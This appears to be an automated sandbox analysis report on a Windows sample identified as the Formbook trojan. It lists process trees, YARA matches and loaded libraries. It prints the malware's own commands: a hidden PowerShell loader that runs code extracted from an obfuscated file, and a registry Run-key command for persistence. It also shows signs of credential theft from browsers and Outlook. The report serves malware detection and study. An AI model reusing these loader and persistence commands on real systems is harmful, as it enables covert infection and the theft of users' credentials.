        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CF43F12_2_031CF43F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0310146012_2_03101460
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CFB7612_2_031CFB76
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312FB8012_2_0312FB80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03185BF012_2_03185BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0314DBF912_2_0314DBF9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CFA4912_2_031CFA49
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C7A4612_2_031C7A46
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03183A6C12_2_03183A6C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03155AA012_2_03155AA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031ADAAC12_2_031ADAAC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031B1AA312_2_031B1AA3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031BDAC612_2_031BDAC6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031A591012_2_031A5910
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0311995012_2_03119950
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312B95012_2_0312B950
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0317D80012_2_0317D800
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031138E012_2_031138E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CFF0912_2_031CFF09
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03111F9212_2_03111F92
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CFFB112_2_031CFFB1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030D3FD512_2_030D3FD5
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_030D3FD212_2_030D3FD2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03119EB012_2_03119EB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C1D5A12_2_031C1D5A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03113D4012_2_03113D40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031C7D7312_2_031C7D73
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0312FDC012_2_0312FDC0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_03189C3212_2_03189C32
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_031CFCF212_2_031CFCF2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0284137012_2_02841370
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0283A7B012_2_0283A7B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0283C73012_2_0283C730
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_0283C51012_2_0283C510
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02842EAC12_2_02842EAC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02842EB012_2_02842EB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02859E8012_2_02859E80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0318F290 appears 103 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03157E54 appears 107 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 030FB970 appears 262 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 03145130 appears 58 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0317EA12 appears 86 times
        Source: 160420241245287.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
        Source: 0000000D.00000002.2887373536.0000000001100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.2169059789.00000000201B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2887996952.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2887919458.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000002.2169858516.0000000021220000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000B.00000002.2887891622.0000000003350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/54@5/6
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045CA
        Source: C:\Users\user\Desktop\160420241245287.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
        Source: C:\Users\user\Desktop\160420241245287.exeFile created: C:\Users\user\AppData\Roaming\opbevaringsstederJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
        Source: C:\Users\user\Desktop\160420241245287.exeFile created: C:\Users\user\AppData\Local\Temp\nsj6995.tmpJump to behavior
        Source: 160420241245287.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
        Source: C:\Users\user\Desktop\160420241245287.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: cmd.exe, 0000000C.00000003.2333166165.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2886759611.0000000002A14000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2886759611.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000003.2330740762.0000000002A35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: 160420241245287.exeVirustotal: Detection: 18%
        Source: C:\Users\user\Desktop\160420241245287.exeFile read: C:\Users\user\Desktop\160420241245287.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\160420241245287.exe "C:\Users\user\Desktop\160420241245287.exe"
        Source: C:\Users\user\Desktop\160420241245287.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe"
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\160420241245287.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Titelbladenes=Get-Content 'C:\Users\user\AppData\Roaming\opbevaringssteder\Shrinkageproof\Ursa\Soklernes\Randrusianeren.Unf';$Ryslerne=$Titelbladenes.SubString(75194,3);.$Ryslerne($Titelbladenes)"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Untapestried.exe "C:\Users\user\AppData\Local\Temp\Untapestried.exe"Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Lgplante" /t REG_EXPAND_SZ /d "%Divergente% -windowstyle minimized $Millibar=(Get-ItemProperty -Path 'HKCU:\Ciconiform\').Syskerne;%Divergente% ($Millibar)"Jump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Untapestried.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\PgUIBAhYIyzKBwnhMMfkCsgFfuljYPVYwOeOfmSnegE\bvvgQqxLmFZr.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\160420241245287.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5~ source: powershell.exe, 00000001.00000002.2060432087.000000000767E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Untapestried.exe, 00000007.00000001.1996319048.0000000000649000.00000008.00000001.01000000.00000009.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bvvgQqxLmFZr.exe, 0000000B.00000002.2887014647.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp, bvvgQqxLmFZr.exe, 0000000D.00000002.2886634622.0000000000A4E000.00000002.00000001.01000000.0000000A.sdmp
